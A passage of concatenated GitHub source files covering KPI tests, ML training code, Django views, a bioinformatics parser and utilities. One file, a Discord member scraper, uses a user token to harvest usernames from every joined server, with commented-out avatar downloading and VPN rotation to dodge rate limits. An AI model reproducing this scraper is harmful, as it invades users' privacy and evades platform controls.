A KPI which simply returns the input value.\n'''\n\nPOWER_KPI = KPI('Voltage * Current')\n'''\nDoes a power computation (voltage times current).\n'''\n\nAVG_POWER_KPI = KPI('avg(Voltage * Current)')\nMAX_POWER_KPI = KPI('max(Voltage * Current)')\nMIN_POWER_KPI = KPI('min(Voltage * Current)')\n\nCOMPOUND_KPI = KPI('min(Voltage) * 0.2 + max(Current) * 0.6')\n\nD_POWER = dp.Dataset({\n    'Power': dp.Series([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555], TIMES),\n})\n'''\nThe result of multiplying Voltage and Current from D1 and D2.\n'''\n\nclass TestKPI(TestCase, ResultAssertions):\n    def test_identity_kpi(self):\n        '''Test a KPI that does a NOOP.'''\n        result = ID_KPI.run('Identity', D1, {\n            'x': 'Voltage',\n        })\n        self.assertResultEqual(result, Result(D1.select(['Voltage']).rename({ 'Voltage': 'Identity' })))\n\n    def test_default_mappings(self):\n        '''The default mappings should match the symbols used in the KPI computation.'''\n        result = POWER_KPI.run('Power', D1)\n        self.assertResultEqual(result, D_POWER)\n\n    def test_compound_kpi(self):\n        result = COMPOUND_KPI.run('Value', D1)\n        self.assertEqual(result.get_aggregations(), {\n            'Value': min([1.23, 5.32, 8.19]) * 0.2 + max([0.32, -3.2, 4.2555]) * 0.6,\n        })\n\n    def test_average_power(self):\n        result = AVG_POWER_KPI.run('Average Power', D1)\n        self.assertEqual(result.get_aggregations(), {\n            'Average Power': sum([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555]) / 3,\n        })\n\n    def test_max_power(self):\n        result = MAX_POWER_KPI.run('Max Power', D1)\n        self.assertEqual(result.get_aggregations(), {\n            'Max Power': max([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555]),\n        }) \n\n    def test_min_power(self):\n        result = MIN_POWER_KPI.run('Min Power', D1)\n        self.assertEqual(result.get_aggregations(), {\n            'Min Power': min([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555]),\n        }) \n\n    def test_excluding_time_column(self):\n        result = POWER_KPI.run('Power', D1)\n        self.assertResultEqual(result, dp.Dataset({\n            'Power': dp.Series([1.23 * 0.32, 5.32 * -3.2, 8.19 * 4.2555], TIMES),\n        }))\n\n    def test_mappings(self):\n        '''The input Dataset should be able to map its input column names.'''\n        result = POWER_KPI.run('Power', D2, {\n            'Voltage': 'volts',\n            'Current': 'amps',\n        })\n        self.assertResultEqual(result, D_POWER)\n\ntest_suite = TestKPI\n","repo_name":"bergerab/dps","sub_path":"dplib/tests/test_kpi.py","file_name":"test_kpi.py","file_ext":"py","file_size_in_byte":3128,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"2242912528","text":"import discum, json, requests, datetime, os, time, threading\r\nfrom colorama import Fore\r\n\r\n__token__ = \"YOUR TOKEN\"\r\ndef get_time():\r\n    now = datetime.datetime.now()\r\n    current_time = now.strftime(\"%H:%M:%S\")\r\n    return current_time\r\ndef pprint(text): print(f\" {Fore.LIGHTCYAN_EX}[{get_time()}]{Fore.RESET} {Fore.RED}=>{Fore.WHITE} {text}\")\r\n\r\nbot = discum.Client(token=__token__, log=False)\r\ntotal = 0\r\namount_pfp = 0\r\nfailed = 0\r\namount = 0\r\n\r\ndef getheaders(token=None, content_type=\"application/json\"):\r\n\theaders = {\"Content-Type\": content_type, \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11\" }\r\n\tif token: headers.update({\"Authorization\": token})\r\n\treturn headers\r\nguildsIds = requests.get(\"https://discord.com/api/v8/users/@me/guilds\", headers=getheaders(__token__)).json()\r\ndef close_after_fetching(resp, guild_id):\r\n\tif bot.gateway.finishedMemberFetching(guild_id): 
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}});bot.gateway.close()\r\ndef get_members(guild_id, channel_id): bot.gateway.fetchMembers(guild_id, channel_id, keep=\"all\", wait=1);bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}}); bot.gateway.run(); bot.gateway.resetSession() ;return bot.gateway.session.guild(guild_id).members\r\nfor guildidsss in guildsIds:\r\n\ttry:\r\n\t\tguild_id = guildidsss['id']\r\n\t\tguild_name = guildidsss['name']\r\n\t\tpprint(f\"Getting channels | GUILD: {guild_name}, ID: {guild_id}\")\r\n\t\tchannels = requests.get(f\"https://discord.com/api/v9/guilds/{guildidsss['id']}/channels\", headers=getheaders(__token__)).json()\r\n\t\tfor channel in channels:\r\n\t\t\tchannel_id = channel['id']\r\n\t\t\tbreak\r\n\t\tpprint(\"Getting names\")\r\n\t\ttry: members = get_members(guild_id, channel_id)\r\n\t\texcept Exception as e:\r\n\t\t\tpprint(f\"{Fore.RED}[ERROR]{Fore.RESET} {e}\")\r\n\t\t\tcontinue\r\n\t\tids = []\r\n\t\tfor key in members.keys(): ids.append(key)\r\n\t\tpprint(f\"Got {Fore.GREEN}{len(ids)}{Fore.RESET} names\")\r\n\t\tfor username in ids:\r\n\t\t\ttry:\r\n\t\t\t\tuserid = members[username]['presence']['user']['id']\r\n\t\t\t\t# remove the hashtags to also scrape pfps (change the `mullvad connect` to some other vpn or just add proxy support)\r\n\t\t\t\t#\r\n\t\t\t\t# try:\r\n\t\t\t\t# \tuserprofile = requests.get(f\"https://discord.com/api/v9/users/{userid}/profile\", headers=getheaders(__token__)).json()\r\n\t\t\t\t# \tr = requests.get(f\"https://cdn.discordapp.com/avatars/{userid}/{userprofile['user']['avatar']}.png?size=2048\")\r\n\t\t\t\t# \timg_data = r.content\r\n\t\t\t\t# \tif r.status_code == 200:\r\n\t\t\t\t# \t\tpprint(f\"Saving PFP status code: {Fore.GREEN}{r.status_code}{Fore.RESET} | Total saved: {Fore.GREEN}{amount_pfp}{Fore.RESET}\")\r\n\t\t\t\t# \t\tamount_pfp += 1\r\n\t\t\t\t# \telse: pprint(f\"Status code: {Fore.RED}{r.status_code} {Fore.RESET}| Username: {Fore.RED}{username}{Fore.RESET}\")\r\n\t\t\t\t# \twith open(f'pfps\\\\{userid}.png', 'wb') as sex: sex.write(img_data)\r\n\t\t\t\t# \tif amount > 100:\r\n\t\t\t\t# \t\tpprint(\"Hit 100 pfps, changing Mullvad Servers\")\r\n\t\t\t\t# \t\tos.system(\"mullvad disconnect\")\r\n\t\t\t\t# \t\ttime.sleep(4)\r\n\t\t\t\t# \t\tos.system(\"mullvad connect\")\r\n\t\t\t\t# \t\ttime.sleep(4)\r\n\t\t\t\t# \t\tpprint(\"Done changing Mullvad Servers, amount saved is now 0\")\r\n\t\t\t\t# \t\tamount = 0\r\n\t\t\t\t# except: pprint(f\"Failed to get profile for {members[username]['username']}#{members[username]['discriminator']}\")\r\n\t\t\t\twith open(\"names.txt\", \"a\") as f: \r\n\t\t\t\t\ttotal += 1\r\n\t\t\t\t\tf.write(members[username][\"username\"] + \"\\n\")\r\n\t\t\t\t\tamount += 1\r\n\t\t\texcept Exception as e: failed += 1\r\n\t\tpprint(f\"Done saving {guild_name}\\n\")\r\n\texcept:pass\r\npprint(f\"\\n\\nDone! 
Total (tried to) save: {Fore.GREEN}{total}{Fore.RESET} in a total of {Fore.GREEN}{len(guildsIds)} {Fore.RESET} guilds | Failed: {Fore.RED}{failed}{Fore.RESET}\\n {Fore.LIGHTCYAN_EX}[{get_time()}]{Fore.RESET} {Fore.RED}=>{Fore.WHITE} Actual amount in text file: {Fore.GREEN}{amount}\")\r\n","repo_name":"DaniEnsi/discord-member-scraper","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3866,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"7495543635","text":"import logging\nimport pickle\nfrom datetime import datetime\n\nimport numpy as np\nimport torch\nfrom dynaconf import settings\n\nfrom paths import data_directory_path\nfrom language_loader import LanguageLoader\nfrom model import Model\nfrom model_parameters import ModelParameters\n\nlogger = logging.getLogger(__name__)\n\nlogging.basicConfig(filename='training_history.log', level=logging.INFO)\n\n\nclass TrainingEngine:\n \"\"\"\n Integrates the different modules into one and trains the model.\n \"\"\"\n\n def __init__(self):\n\n if torch.cuda.is_available():\n self.device = 'cuda'\n else:\n self.device = 'cpu'\n\n logger.info(f'Initializing the TrainingEngine on {self.device}')\n\n self.loader = LanguageLoader()\n\n self.model_parameters = ModelParameters(embedding_size=self.loader.cipher_database.number_of_items)\n\n self.model = Model(self.loader.cipher_database,\n self.loader.plain_database,\n self.model_parameters,\n self.device)\n\n model_parameters = filter(lambda p: p.requires_grad, self.model.parameters())\n params = sum([np.prod(p.size()) for p in model_parameters])\n\n logger.info(f'Initialized TrainingEngine with {params} trainable parameters')\n\n def train_model(self, num_iterations):\n \"\"\"\n Train the model for the given number of iterations.\n \"\"\"\n losses = []\n logger.info('Starting Training')\n cipher_batches, plain_batches = self.loader.get_batches(number_of_batches=num_iterations,\n batch_size=settings.BATCH_SIZE)\n\n for iteration in range(num_iterations):\n\n input_tensor = cipher_batches[iteration].to(self.device)\n target_tensor = plain_batches[iteration].to(self.device)\n\n loss = self.model.train(input_tensor, target_tensor)\n\n losses.append(loss)\n\n if iteration % 500 == 0:\n logger.info(f\"{datetime.now().time()} \"\n f\"Iteration: {iteration} out of {num_iterations}, \"\n f\"Loss: {np.round(np.mean(losses), 4)}\")\n losses = []\n print(loss)\n logger.info('Training Complete. Saving components.')\n\n self.serialize_components()\n\n def serialize_components(self):\n \"\"\"\n Serialize the model and the data loader\n \"\"\"\n torch.save(self.model, data_directory_path / 'serialized_model.pth.tar')\n\n with open(data_directory_path / 'serialized_loader.p', 'wb') as loader:\n pickle.dump(self.loader, loader)\n\n logger.info('Saving components complete.')\n\n\nif __name__ == '__main__':\n engine = TrainingEngine()\n engine.train_model(90000)\n","repo_name":"fin-vermehr/enigma","sub_path":"src/training_engine.py","file_name":"training_engine.py","file_ext":"py","file_size_in_byte":2823,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"12030789484","text":"from django.urls import path\nfrom . 
import views\nfrom .views import PostListView, PostDetailView, PostCreateView, PostDeleteView, likes_view\n\nurlpatterns = [\n    path('', PostListView.as_view(), name = 'blog-home'),\n    path('post/<int:pk>/', PostDetailView.as_view(), name = 'post-detail'),\n    path('post/new/', PostCreateView.as_view(), name = 'post-create'),\n    path('post/<int:pk>/delete/', PostDeleteView.as_view(), name = 'post-delete'),\n    path('like/<int:pk>/', views.likes_view,name='post-like'),\n\n]\n##Old path for detail view\n##path('post/<int:pk>/', views.POST_DETAIL, name = 'post-detail'),\n","repo_name":"ahamedt/PennApps-submission","sub_path":"BlogApp/Blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"74960272483","text":"import tensorflow as tf \r\nimport numpy as np \r\nfrom tensorflow.keras.models import Sequential\r\nfrom tensorflow.keras.layers import Dense, Dropout, Activation, Flatten\r\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D\r\n\r\nimport os\r\nimport urllib.request\r\nimport pickle\r\nimport gzip\r\n\r\ndef load_batch(filename):\r\n\tf = open(filename, \"rb\").read()\r\n\tsize = 32*32*3+1\r\n\tlabels = []\r\n\timages = []\r\n\tfor i in range(10000):\r\n\t\t# np.fromstring is deprecated; np.frombuffer is the supported equivalent for bytes input\r\n\t\tarr = np.frombuffer(f[i*size:(i+1)*size], dtype=np.uint8)\r\n\t\tlab = np.identity(10)[arr[0]]\r\n\t\timg = arr[1:].reshape((3, 32, 32)).transpose((1, 2, 0))\r\n\r\n\t\tlabels.append(lab)\r\n\t\timages.append((img/255))\r\n\treturn np.array(images), np.array(labels)\r\n\r\nclass CIFAR:\r\n\tdef __init__(self):\r\n\t\ttrain_data = []\r\n\t\ttrain_labels = []\r\n\r\n\t\tif not os.path.exists(\"cifar-10-batches-bin\"):\r\n\t\t\turllib.request.urlretrieve(\"https://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz\",\r\n                                       \"cifar-data.tar.gz\")\r\n\t\t\tos.popen(\"tar -xzf cifar-data.tar.gz\").read()\r\n\r\n\t\tfor i in range(5):\r\n\t\t\tr, s = load_batch(\"cifar-10-batches-bin/data_batch_\"+str(i+1)+\".bin\")\r\n\t\t\ttrain_data.extend(r)\r\n\t\t\ttrain_labels.extend(s)\r\n\r\n\t\ttrain_data = np.array(train_data, dtype=np.float32)\r\n\t\ttrain_labels = np.array(train_labels)\r\n\r\n\t\tself.test_data, self.test_labels = load_batch(\"cifar-10-batches-bin/test_batch.bin\")\r\n\r\n\t\tVALIDATION_SIZE = 5000\r\n\r\n\t\tself.validation_data = train_data[:VALIDATION_SIZE, :, :, :]\r\n\t\tself.validation_labels = train_labels[:VALIDATION_SIZE, :]\r\n\t\tself.train_data = train_data[VALIDATION_SIZE:, :, :, :]\r\n\t\tself.train_labels = train_labels[VALIDATION_SIZE:, :]\r\n\r\nclass CIFARModel:\r\n\tdef __init__(self, restore=None):\r\n\t\tself.num_channels = 3\r\n\t\tself.image_size = 32\r\n\t\tself.num_labels = 10\r\n\r\n\t\tmodel = Sequential()\r\n\r\n\t\tmodel.add(Conv2D(64, (3, 3), input_shape=(32, 32, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Conv2D(64, (3, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n\t\tmodel.add(Conv2D(128, (3, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Conv2D(128, (3, 3)))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(MaxPooling2D(pool_size=(2, 2)))\r\n\r\n\t\tmodel.add(Flatten())\r\n\t\tmodel.add(Dense(256))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Dense(256))\r\n\t\tmodel.add(Activation('relu'))\r\n\t\tmodel.add(Dense(10))\r\n\r\n\t\tif restore:\r\n\t\t\tmodel.load_weights(restore)\r\n\r\n\t\tself.model = model\r\n\r\n\t# predict was nested inside __init__ and therefore never reachable as a method\r\n\tdef predict(self, data):\r\n\t\treturn 
self.model(data)\r\n","repo_name":"HAOYUN49/Evolutionary","sub_path":"setup_cifar.py","file_name":"setup_cifar.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11951808477","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserChangeForm\nfrom .models import Profile\n\n\nclass EditEmailForm(UserChangeForm):\n\n    class Meta:\n        model = User\n        fields = [\n            'email'\n        ]\n\n\nclass EditNamesForm(UserChangeForm):\n\n    class Meta:\n        model = User\n        fields = [\n            'first_name',\n            'last_name'\n        ]\n\n\nclass EditProfileForm(forms.ModelForm):\n    class Meta:\n        model = Profile\n        fields = [\n            'nr_dowodu',\n            'nr_prawa_jazdy',\n            'nr_telefonu'\n        ]\n","repo_name":"kamip123/rentAndGo","sub_path":"profil/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73453463204","text":"\"\"\"\nLeetcode 746\n\nYou are given an integer array cost where cost[i] is the cost of ith step on a staircase.\n Once you pay the cost, you can either climb one or two steps.\n\nYou can either start from the step with index 0, or the step with index 1.\n\nReturn the minimum cost to reach the top of the floor.\n\n\nExample 1:\n\nInput: cost = [10,15,20]\nOutput: 15\nExplanation: You will start at index 1.\n- Pay 15 and climb two steps to reach the top.\nThe total cost is 15.\nExample 2:\n\nInput: cost = [1,100,1,1,1,100,1,1,100,1]\nOutput: 6\n\n\"\"\"\n\nfrom typing import Optional\nclass Solution:\n    def minCostClimbingStairs(self, cost: list[int], n:Optional[int]=None, dp:Optional[list[int]]=None) -> int:\n        if n is None:\n            n = len(cost)\n            cost.append(0)\n            # return here so the top-level call does not fall through and recompute\n            return self.minCostClimbingStairs(cost,n,dp)\n        if dp is None:\n            dp = [-1] * (n+1)\n        if dp[n] != -1:\n            return dp[n]\n        if n == 0:\n            dp[0] = cost[0]\n            return dp[0]\n        if n == 1:\n            dp[1] = cost[1]\n            return dp[1]\n        dp[n] = cost[n] + min(self.minCostClimbingStairs(cost,n-2,dp), self.minCostClimbingStairs(cost,n-1,dp))\n        return dp[n]\n\nprint(Solution().minCostClimbingStairs([10,15,20]))\nprint(Solution().minCostClimbingStairs([1,100,1,1,1,100,1,1,100,1]))\n","repo_name":"clintjohnsn/ds-algo","sub_path":"dynamic programming/easy/min_cost_climbing_stairs.py","file_name":"min_cost_climbing_stairs.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23485420202","text":"#!/usr/bin/env python3\n\n###############################################\n# Author: B. 
Anderson\n# Date: Aug 2023\n# Description: parse the results of a series of RELAX runs to select optimal values\n#\tThis assumes the results have already been tabulated in csv files, with a column of samples,\n#\tand three columns per gene corresponding to K, p and LogL of the RELAX alternative model\n#\tArguments are the csv files (one per run; at least two), which should have the same unique taxa and genes\n###############################################\n\n\nimport sys\nimport argparse\n\n\n# instantiate the parser\nparser = argparse.ArgumentParser(description = 'A script to parse tabulated (csv file) RELAX outputs')\n\n\n# add arguments to parse\nparser.add_argument('results', type = str, nargs = '*', help = 'The csv result files; these need to have ' +\n\t'the same samples and genes in each.')\n\n\n# parse the command line\nif len(sys.argv[1:]) == 0:\t\t# if there are no arguments\n\tparser.print_help(sys.stderr)\n\tsys.exit(1)\nargs = parser.parse_args()\nresults = args.results\n\nif len(results) < 2:\n\tprint('Please provide at least two run results files\\n')\n\tparser.print_help(sys.stderr)\n\tsys.exit(1)\n\n\n# Read in the results\ngene_list = []\ntaxa = []\nmaster_list = []\nfor fileno, result_file in enumerate(results):\n\twith open(result_file, 'r') as infile:\n\t\tfor lineno, line in enumerate(infile):\n\t\t\tparts = line.strip().split(',')\n\t\t\tif lineno == 0:\n\t\t\t\tgene_entries = parts[1: ]\n\t\t\t\tif fileno == 0:\t\t# first file\n\t\t\t\t\tfor gene in gene_entries:\n\t\t\t\t\t\tif gene not in gene_list:\n\t\t\t\t\t\t\tgene_list.append(gene)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcontinue\n\t\t\t\telif len(gene_list) != (len(gene_entries) / 3):\n\t\t\t\t\tprint('Wrong number of gene entries in ' + str(result_file))\n\t\t\t\t\tparser.print_help(sys.stderr)\n\t\t\t\t\tsys.exit(1)\n\t\t\telse:\n\t\t\t\ttaxon = parts[0]\n\t\t\t\tif fileno == 0:\t\t# first file\n\t\t\t\t\ttaxa.append(taxon)\n\t\t\t\telif taxon not in taxa:\n\t\t\t\t\tprint('Wrong taxon in ' + str(result_file))\n\t\t\t\t\tparser.print_help(sys.stderr)\n\t\t\t\t\tsys.exit(1)\n\t\t\t\t\n\t\t\t\tmaster_list.append([taxon, parts[1: ]])\n\n\n# Go through the samples in the list and choose the best values for each sample\n# Determine the p-value significance and indicate it where appropriate\n# Round the K value\n# Count how many significant runs had K < 1 and how many had K > 1 (to assess bimodality)\nout_list = []\nfor taxon in taxa:\n\ttop_list = []\n\tresult_list = [item[1] for item in master_list if item[0] == taxon]\t\t# grab the runs for that taxon\n\tfor index, gene in enumerate(gene_list):\n\t\tif result_list[0][index * 3] == '-':\t\t# gene missing\n\t\t\ttop_list.append(['-', '-'])\n\t\telse:\n\t\t\tKvals = [float(item[index * 3 + 0]) for item in result_list]\n\t\t\tpvals = [float(item[index * 3 + 1]) for item in result_list]\n\t\t\tLvals = [float(item[index * 3 + 2]) for item in result_list]\n\t\t\t# determine top likelihood and corresponding K and p for reporting\n\t\t\tmax_index = Lvals.index(max(Lvals))\n\t\t\tif pvals[max_index] < 0.05:\n\t\t\t\tif pvals[max_index] < 0.01:\n\t\t\t\t\tif pvals[max_index] < 0.001:\n\t\t\t\t\t\tsignif = '< 0.001'\n\t\t\t\t\t\ttop_K = str(round(Kvals[max_index], 1)) + '***'\n\t\t\t\t\telse:\n\t\t\t\t\t\tsignif = '< 0.01'\n\t\t\t\t\t\ttop_K = str(round(Kvals[max_index], 1)) + '**'\n\t\t\t\telse:\n\t\t\t\t\tsignif = '< 0.05'\n\t\t\t\t\ttop_K = str(round(Kvals[max_index], 1)) + '*'\n\t\t\telse:\n\t\t\t\tsignif = 'n.s.'\n\t\t\t\ttop_K = str(round(Kvals[max_index], 1))\n\t\t\t# 
determine how many significant runs had divergent K values (< 1 and > 1)\n\t\t\tsig_indices = [i for i, pval in enumerate(pvals) if pval < 0.05]\n\t\t\tif len(sig_indices) == 0:\t\t# no significant runs\n\t\t\t\tcount_blurb = 'n.s.'\n\t\t\telse:\n\t\t\t\tsig_Kvals = [Kvals[i] for i in sig_indices]\n\t\t\t\tcount_greater = len([item for item in sig_Kvals if item >= 1])\n\t\t\t\tcount_less = len([item for item in sig_Kvals if item < 1])\n\t\t\t\tcount_blurb = str(count_less) + '/' + str(count_greater) + \\\n\t\t\t\t\t' of ' + str(count_greater + count_less)\n\t\t\t# record\n\t\t\ttop_list.append([top_K, count_blurb])\n\tout_list.append([taxon, top_list])\n\n\n# Print the output as csv (can be directed to a file with \">\")\nprint('Sample,' + ','.join([(item + ',' + item) for item in gene_list]))\nfor entry in out_list:\n\tprint(entry[0] + ',' + ','.join([','.join(item) for item in entry[1]]))\n","repo_name":"bmichanderson/scripts","sub_path":"relax_parse.py","file_name":"relax_parse.py","file_ext":"py","file_size_in_byte":4156,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33426519637","text":"import sys, inspect, pprint, logging, os\n\nfrom config import *\n\n# ################################# Log ################################# #\nDEBUG = 0\nINFO = 1\nWARNING = 2\nERROR = 3\nCRITICAL = 4\n\nLOGGER_NAME = 'edge_cloud'\n\nlogger = logging.getLogger(LOGGER_NAME)\nlogger.setLevel(logging.INFO)\n# logger.setLevel(logging.DEBUG)\n\n# FORMAT = '[%(asctime)s - %(funcName)10s()] %(msg)s'\n# FORMAT = '[%(asctime)s - %(func_name)6s()] %(msg)s'\n# FORMAT = '[%(filename)s:%(lineno)d] %(func_name):: %(msg)s'\nFORMAT = '%(levelname)s] %(func_name)s: %(msg)s'\n# logger.basicConfig(format=FORMAT, level=logging.DEBUG) # filename='c.log'\nformatter = logging.Formatter(FORMAT)\n\ndef log_to_std():\n\tlogger = logging.getLogger(LOGGER_NAME)\n\tsh = logging.StreamHandler()\n\tsh.setFormatter(formatter)\n\tlogger.addHandler(sh)\n\nlevel_log_m = {INFO: logger.info, DEBUG: logger.debug, WARNING: logger.warning, ERROR: logger.error, CRITICAL: logger.critical}\n\ndef log_to_file(filename, directory='./log'):\n if directory and not os.path.exists(directory):\n os.makedirs(directory)\n\n logger = logging.getLogger(LOGGER_NAME)\n\n filepath = '{}/{}'.format(directory, filename)\n fh = logging.FileHandler(filepath, mode='w')\n fh.setLevel(logging.DEBUG)\n fh.setFormatter(formatter)\n logger.addHandler(fh)\n\ndef get_extra():\n\t# caller_list = []\n\t# frame = inspect.currentframe().f_back\n\t# while frame.f_back:\n\t#\t\tcaller_list.append('{0}'.format(frame.f_code.co_name))\n\t#\t\tframe = frame.f_back\n\t# callers =\t '/'.join(reversed(caller_list))\n\n\t# return {'func_name': '{0}'.format((inspect.currentframe().f_back.f_back).f_code.co_name)}\n\tframe = inspect.currentframe().f_back.f_back.f_code\n\treturn {'func_name': '{}::{}'.format(os.path.split(frame.co_filename)[1], frame.co_name)}\n\ndef log(level: int, _msg_: str, **kwargs):\n\tlevel_log_m[level](\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\n# Always log\ndef alog(level: int, _msg_: str, **kwargs):\n\tlogger.critical(\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\ndef pstr(**kwargs):\n\ts = ''\n\tfor k, v in kwargs.items():\n\t\ts += \" {}: {}\\n\".format(k, pprint.pformat(v))\n\treturn s\n\n# ############################### Assert ############################### #\ndef check(condition: bool, _msg_: str, **kwargs):\n\tif not 
condition:\n\t\tlogger.error(\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\t\traise AssertionError()\n\ndef assert_(_msg_: str, **kwargs):\n\tlogger.error(\"{}\\n{}\".format(_msg_, pstr(**kwargs)), extra=get_extra())\n\traise AssertionError()\n\n# ############################### Sim log ############################### #\ndef slog(level: int, env, caller: str, _msg_: str, **kwargs):\n\tlevel_log_m[level](\"t: {:.2f}] {}: {}\\n{}\".format(env.now, caller, _msg_, pstr(**kwargs)), extra=get_extra())\n","repo_name":"mfatihaktas/edge-load-balance","sub_path":"debug_utils.py","file_name":"debug_utils.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73110541924","text":"# -*- coding: utf-8 -*-\nfrom odoo.exceptions import ValidationError\nfrom odoo import models, fields, api\n\n\nclass TodoTask(models.Model):\n\n    _name = 'todo.task'\n    _inherit = ['todo.task','mail.thread']\n\n\n\n    user_id = fields.Many2one(comodel_name=\"res.users\", string=\"Responsible\", required=False, )\n    date_deadline = fields.Date(string=\"Deadline\", required=False, )\n\n    @api.multi\n    def do_toggle_done(self):\n        for task in self:\n            if task.user_id != self.env.user:\n                raise ValidationError('Only the responsible user can do this')\n        return super(TodoTask, self).do_toggle_done()\n\n\n\n\n\n\n    # @api.model\n    #def do_clear_done(self):\n    #    dones = self.search([('is_done', '=', True)])\n    #    dones.write({'active': False})\n    #    return True","repo_name":"cheikhousy/KeyfaDev","sub_path":"customaddons/todo_user/todo_task.py","file_name":"todo_task.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42832171975","text":"import csv\nimport functools\nfrom hashlib import sha256\nfrom pathlib import Path\n\nimport numpy as np\nfrom nxontology import NXOntology\n\nfrom nxontology_ml.utils import ROOT_DIR\n\n\ndef read_training_data(\n    take: int | None = None,\n    filter_out_non_disease: bool = False,\n    nxo: NXOntology[str] | None = None,\n    data_path: Path = ROOT_DIR / \"data/efo_otar_slim_v3.43.0_rs_classification.tsv\",\n) -> tuple[np.ndarray, np.ndarray]:\n    \"\"\"\n    By default, the data is (consistently) shuffled\n    \"\"\"\n    # Get Ontology\n    nxo = nxo or get_efo_otar_slim()\n    nodes: set[str] = set(nxo.graph)\n\n    # Get labelled data\n    labelled_nodes: list[str] = []\n    labels: list[str] = []\n    with data_path.open(mode=\"r\") as f:\n        for i, (efo_otar_slim_id, efo_label, rs_classification) in enumerate(\n            csv.reader(f, delimiter=\"\\t\")\n        ):\n            if i == 0:\n                # Skip header\n                assert (efo_otar_slim_id, efo_label, rs_classification) == (\n                    \"efo_otar_slim_id\",\n                    \"efo_label\",\n                    \"rs_classification\",\n                )\n            elif filter_out_non_disease and rs_classification == \"04-non-disease\":\n                continue\n            else:\n                if efo_otar_slim_id in nodes:\n                    labelled_nodes.append(efo_otar_slim_id)\n                    labels.append(rs_classification)\n\n    # Consistent shuffling (i.e. 
sort by hash)\n    z = list(zip(labelled_nodes, labels, strict=True))\n    z.sort(key=lambda nl: sha256(nl[0].encode()).hexdigest())\n    labelled_nodes, labels = zip(*z, strict=True)  # type: ignore[assignment]\n\n    if take:\n        labelled_nodes = labelled_nodes[:take]\n        labels = labels[:take]\n    return np.array(labelled_nodes), np.array(labels)\n\n\nEFO_OTAR_SLIM_URL: str = \"https://github.com/related-sciences/nxontology-data/raw/2ce01d8495024d46cbc54fb0c26a92500ad717e0/efo_otar_slim.json\"\n\n\n@functools.cache\ndef get_efo_otar_slim(url: str = EFO_OTAR_SLIM_URL) -> NXOntology[str]:\n    nxo = NXOntology[str].read_node_link_json(url)\n    assert isinstance(nxo, NXOntology)\n    nxo.freeze()\n    return nxo\n","repo_name":"related-sciences/nxontology-ml","sub_path":"nxontology_ml/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"11729732746","text":"#!/usr/bin/python3\n'''Module that lists all State objects that contain the letter a'''\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nimport sys\nfrom model_state import Base, State\n\n\nif __name__ == '__main__':\n    engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'\n                           .format(sys.argv[1], sys.argv[2], sys.argv[3]),\n                           pool_pre_ping=True)\n\n    Session = sessionmaker(engine)\n    session = Session()\n\n    states = session.query(State).filter(\n        State.name.ilike('%a%')\n    )\n    for state in states:\n        print(f\"{state.id}: {state.name}\")\n    session.commit()\n    session.close()\n","repo_name":"vsroyvs/holbertonschool-higher_level_programming","sub_path":"python-object_relational_mapping/9-model_state_filter_a.py","file_name":"9-model_state_filter_a.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"1864814197","text":"from marshmallow import ValidationError, Schema\nfrom aiohttp import web\nfrom typing import Optional, Mapping, NoReturn\n\n\nclass CustomException(Exception):\n    def __init__(self, message, status):\n        self.message = message\n        self.status = status\n\n\nasync def error_handler(\n    error: ValidationError,\n    req: web.Request,\n    schema: Schema,\n    error_status_code: Optional[int] = None,\n    error_headers: Optional[Mapping[str, str]] 